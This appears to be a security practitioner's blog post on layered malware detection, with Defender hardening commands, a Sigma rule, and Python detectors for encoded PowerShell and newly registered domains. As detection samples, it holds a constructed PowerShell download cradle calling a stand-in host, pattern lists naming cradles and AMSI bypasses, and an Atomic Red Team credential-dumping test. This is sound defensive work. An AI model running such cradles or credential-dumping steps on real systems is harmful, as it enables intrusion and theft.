Last year, I responded to an incident where a fileless PowerShell dropper bypassed three separate security products, lived in memory for eleven days, and exfiltrated 40GB of data before anyone noticed. The organization had antivirus—on every single endpoint. What they didn't have was a strategy. Here's how to build one that treats malware detection as an architecture problem, not a product purchase.
The Problem with "Install AV and Move On"
Legacy antivirus relies on signature databases—hashes and byte patterns of known malware. This works well against commodity threats but crumbles against polymorphic malware, living-off-the-land binaries (LOLBins), and zero-day payloads. Microsoft's own telemetry shows that adversaries increasingly abuse trusted tools like mshta.exe, certutil.exe, and rundll32.exe to execute malicious code without ever dropping a traditional executable to disk.
A mature detection strategy must operate across multiple layers: static analysis, behavioral detection, memory scanning, and network-level inspection.
Layer 1: Harden Your Endpoint Protection Platform (EPP)
Start with your existing antivirus—but configure it aggressively. Most EPP solutions ship with conservative defaults to avoid false positives. In an enterprise environment, you should tighten these.
For Microsoft Defender on Windows endpoints, enforce cloud-delivered protection and block-at-first-sight via Group Policy or Intune:
# Enable cloud-delivered protection and set cloud block level to High+
Set-MpPreference -MAPSReporting Advanced
Set-MpPreference -CloudBlockLevel HighPlus
Set-MpPreference -CloudExtendedTimeout 50
Set-MpPreference -PUAProtection Enabled
Set-MpPreference -SubmitSamplesConsent SendAllSamples
SendAllSamples uploads any file Defender considers suspicious, which may conflict with your data-handling rules; SendSafeSamples keeps the cloud lookups but holds back files that may contain personal data, so pick the value your policy allows rather than copying the line blindly.
Enable Attack Surface Reduction (ASR) rules to block common abuse vectors:
# Block Office apps from creating child processes
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
# Block credential stealing from LSASS
Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enabled
Deploy these in audit mode first (the action value AuditMode instead of Enabled), review the audit events for two weeks, then enforce. Audited ASR hits are logged as event ID 1122 in the Microsoft-Windows-Windows Defender/Operational log and blocks as event ID 1121; anything in the 1122 stream that turns out to be legitimate business activity needs an exclusion before you switch the rule to Enabled, otherwise you will be the one breaking the finance team's macros.
Layer 2: Behavioral Detection with EDR Telemetry
Endpoint Detection and Response (EDR) tools watch what processes do, not just what they look like. This is where you catch the fileless attacks that signature engines miss.
Key behavioral indicators to build detection rules around:
- Parent-child process anomalies: outlook.exe spawning powershell.exe is almost never legitimate.
- Suspicious command-line patterns: Base64-encoded PowerShell, download cradles, or AMSI bypass attempts.
- Unsigned binaries executing from %TEMP% or %APPDATA% directories.
A practical Sigma rule for detecting encoded PowerShell execution:
title: Suspicious Encoded PowerShell Command
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains:
            - '-enc'
            - '-EncodedCommand'
            - 'FromBase64String'
    condition: selection
falsepositives:
    - Administrative scripts that pass -Encoding rather than -EncodedCommand
level: high
Feed these rules into your SIEM or EDR platform and tune from there. Sigma string matching is case-insensitive, so '-enc' already covers '-EncodedCommand' (though not the shorter '-e' and '-ec' forms powershell.exe also accepts), but it also matches any legitimate script that passes -Encoding; expect to tune those out. The rule also assumes the command line was logged at all, which requires Sysmon Event ID 1 or Windows Event ID 4688 with command-line auditing enabled.
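To show what the three behavioral indicators and the Sigma rule above look like as running detection logic, here is an added Python example; it is not code from this article and not part of any EDR product or Sigma tooling. It applies the indicators to constructed Sysmon-style process-creation events (a 'Signed' field is assumed to come from an Authenticode check at enrichment time), decodes the -EncodedCommand payload so the download cradle hidden inside it becomes visible, and matches the parameter by prefix rather than by the '-enc' substring, so an admin script passing -Encoding does not fire. Paths, the base64 payload and every event value are constructed.

```python
"""Behavioral process-creation detections over constructed Sysmon-style events.

Added example for this article, not the author's code and not part of any
EDR product. Events imitate the fields of Sysmon Event ID 1 plus a 'Signed'
field (assumed to come from an Authenticode check at enrichment time); all
values are constructed.
"""
import base64
import binascii
import re
from typing import Dict, List

OFFICE_APPS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "certutil.exe"}
# Directories a standard user can write to without elevation.
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|downloads)\\", re.IGNORECASE)
# Download cradles and AMSI tampering, searched in the decoded payload when
# there is one, otherwise in the raw command line.
SUSPICIOUS_CONTENT = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
        r"|Start-BitsTransfer|certutil.*-urlcache", re.IGNORECASE),
    "amsi_bypass": re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.IGNORECASE),
}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, '' if absent, or
    '<undecodable>' if the argument is not valid base64 / UTF-16LE.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand
    (-e, -ec, -enc, ...), so the parameter is matched by prefix. A token
    such as -Encoding does not match, which is exactly the false positive
    a bare '-enc' substring rule produces.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok[1:].lower()
        if tok[:1] in ("-", "/") and flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return "<undecodable>"
    return ""


def analyze(event: Dict[str, str]) -> List[str]:
    """Apply the three behavioral indicators from the article to one event."""
    findings: List[str] = []
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    cmdline = event.get("CommandLine", "")

    # 1. Parent-child anomaly: an Office app launching a script host.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        findings.append(f"office_spawns_script_host:{parent}->{child}")

    # 2. Suspicious command lines: encoded PowerShell, cradles, AMSI bypass.
    decoded = ""
    if child in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmdline)
        if decoded:
            findings.append("encoded_powershell")
        if "frombase64string" in cmdline.lower():
            findings.append("inline_base64_decode")
    for name, pattern in SUSPICIOUS_CONTENT.items():
        if pattern.search(decoded or cmdline):
            findings.append(name)

    # 3. Unsigned binary running from a user-writable directory.
    if event.get("Signed", "").lower() == "false" and USER_WRITABLE.search(event["Image"]):
        findings.append("unsigned_from_user_writable_dir")
    return findings


# Constructed payload: a classic download cradle, encoded the way
# powershell.exe expects it (UTF-16LE, then base64).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # 1. Fileless dropper launched from a phishing attachment opened in Outlook.
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}",
     "Signed": "true"},
    # 2. Benign admin script that would trip a naive '-enc' substring rule.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\export.ps1 -Encoding UTF8",
     "Signed": "true"},
    # 3. Unsigned binary staged in %APPDATA% under a trusted-looking name.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\alice\AppData\Roaming\updater\svchost.exe",
     "CommandLine": r"C:\Users\alice\AppData\Roaming\updater\svchost.exe",
     "Signed": "false"},
]


def run(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Return {event index: findings} for every event that produced a finding."""
    return {i: f for i, e in enumerate(events) if (f := analyze(e))}


if __name__ == "__main__":
    for idx, found in run(SAMPLE_EVENTS).items():
        print(idx, found)
```

The second sample event is the point of the prefix matching: it contains the substring "-enc" and is exactly what the Sigma rule above would flag, yet it produces no finding here. Decoding the payload rather than just flagging its presence is what lets the same pass also tag the download cradle, which is the detail an analyst needs to triage the alert without re-running the decode by hand.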
Layer 3: Network-Level Inspection
Malware needs to communicate. Deploy DNS filtering to block known command-and-control domains, and watch for clients that switch to DNS over HTTPS (DoH), which carries name resolution past that filter inside ordinary-looking TLS. Tools like Zeek or Suricata on network taps give you protocol-level visibility that endpoint agents can't provide.
At minimum, log and alert on connections to newly registered domains (NRDs)—domains less than 30 days old account for a disproportionate share of malicious infrastructure.
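As an added example of the two checks above (not code from this article and not part of Zeek), here is a Python pass over constructed Zeek dns.log lines that flags queries for registrable domains younger than 30 days, queries whose registration date is unknown, and plaintext lookups of public DoH endpoints, which is the usual bootstrap step before a client moves its resolution to DoH. The registration dates, the log lines and the DoH host list are constructed; in production the dates would come from an RDAP/WHOIS lookup or a vendor NRD feed, and the two-label public-suffix set would be replaced by the full Public Suffix List.

```python
"""Newly-registered-domain (NRD) and DoH-resolver checks over Zeek dns.log lines.

Added example for this article, not the author's code and not part of Zeek.
The log lines, the registration dates and the DoH host list are constructed;
in production the dates come from an RDAP/WHOIS lookup or a vendor NRD feed.
"""
from datetime import date, datetime, timezone
from typing import Dict, List, Optional

NRD_MAX_AGE_DAYS = 30

# Trimmed-down Zeek dns.log (TSV). Real logs carry more columns; the parser
# keys off the #fields header, so extra columns are harmless.
SAMPLE_DNS_LOG = """\
#separator \\x09
#fields\tts\tuid\tid.orig_h\tquery\tqtype_name\trcode_name
1715000000.123\tCx1\t10.0.0.5\tupdates.vendor-portal.example\tA\tNOERROR
1715000001.456\tCx2\t10.0.0.5\tcdn-update-check.example\tA\tNOERROR
1715000002.789\tCx3\t10.0.0.7\tdns.google\tA\tNOERROR
1715000003.012\tCx4\t10.0.0.7\tbilling.example.co.uk\tA\tNOERROR
1715000004.345\tCx5\t10.0.0.9\ta1b2c3d4.not-in-feed.example\tA\tNOERROR
"""

# Constructed registration dates standing in for an RDAP/WHOIS or NRD-feed lookup.
DOMAIN_CREATED: Dict[str, date] = {
    "vendor-portal.example": date(2012, 3, 1),
    "cdn-update-check.example": date(2024, 4, 28),
    "example.co.uk": date(2010, 1, 15),
}

# Public DoH endpoints; a plaintext lookup of one of these is the usual
# bootstrap step before a client moves resolution to DoH.
KNOWN_DOH_HOSTS = {"dns.google", "cloudflare-dns.com", "dns.quad9.net"}

# Two-label public suffixes. Use the full Public Suffix List (for example the
# tldextract package) in production; this sample only shows the edge case.
TWO_LABEL_SUFFIXES = {"co.uk", "org.uk", "com.au", "co.jp"}


def registrable_domain(fqdn: str) -> str:
    """Reduce a query name to the domain that was actually registered."""
    labels = fqdn.rstrip(".").lower().split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def parse_zeek_tsv(text: str) -> List[Dict[str, str]]:
    """Parse Zeek's TSV format using its #fields header; other # lines are skipped."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def domain_age_days(domain: str, observed: date) -> Optional[int]:
    """Days between registration and the observed query, or None if unknown."""
    created = DOMAIN_CREATED.get(domain)
    return (observed - created).days if created else None


def check_dns_log(text: str) -> List[Dict[str, str]]:
    """Return one alert dict per suspicious query, in log order."""
    alerts: List[Dict[str, str]] = []
    for row in parse_zeek_tsv(text):
        query = row["query"].rstrip(".").lower()
        # Zeek's ts is epoch seconds; age is measured at the time of the query.
        observed = datetime.fromtimestamp(float(row["ts"]), tz=timezone.utc).date()
        base = {"uid": row["uid"], "client": row["id.orig_h"]}
        if query in KNOWN_DOH_HOSTS:
            alerts.append({**base, "domain": query, "reason": "doh_resolver_lookup"})
            continue  # the resolver's own domain age is not the interesting part
        domain = registrable_domain(query)
        age = domain_age_days(domain, observed)
        if age is None:
            alerts.append({**base, "domain": domain, "reason": "unknown_registration_date"})
        elif age < NRD_MAX_AGE_DAYS:
            alerts.append({**base, "domain": domain, "reason": f"newly_registered_domain:{age}d"})
    return alerts


if __name__ == "__main__":
    for alert in check_dns_log(SAMPLE_DNS_LOG):
        print(alert)
```

Two design choices are worth calling out. Age is computed at the timestamp of the query, not at analysis time, so replaying a week-old log still produces the same verdict. And a domain with no registration data is surfaced as its own alert rather than silently passed, because a lookup failure is exactly what a freshly registered or privacy-shielded C2 domain looks like from the outside.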
Layer 4: Continuous Validation
Detection strategies rot. Run regular tests mapped to MITRE ATT&CK techniques using tools such as Atomic Red Team:
# Simulate a credential dumping technique (T1003.001)
Invoke-AtomicTest T1003.001 -TestNumbers 1
Run the same test with -CheckPrereqs first, so that a missing dependency is not mistaken for a detection gap, and with -Cleanup afterward so the host is left as you found it. If your stack doesn't alert, you have a gap—document it, tune your rules, and test again.
Final Thought
Antivirus is a component, not a strategy. The organizations that consistently detect and contain malware treat detection engineering as an ongoing discipline: layered defenses, continuous tuning, and regular adversary simulation. Build the architecture, not just the checkbox.
Have questions about antivirus and malware detection strategy? I'm always happy to talk shop — reach out or connect with me on LinkedIn.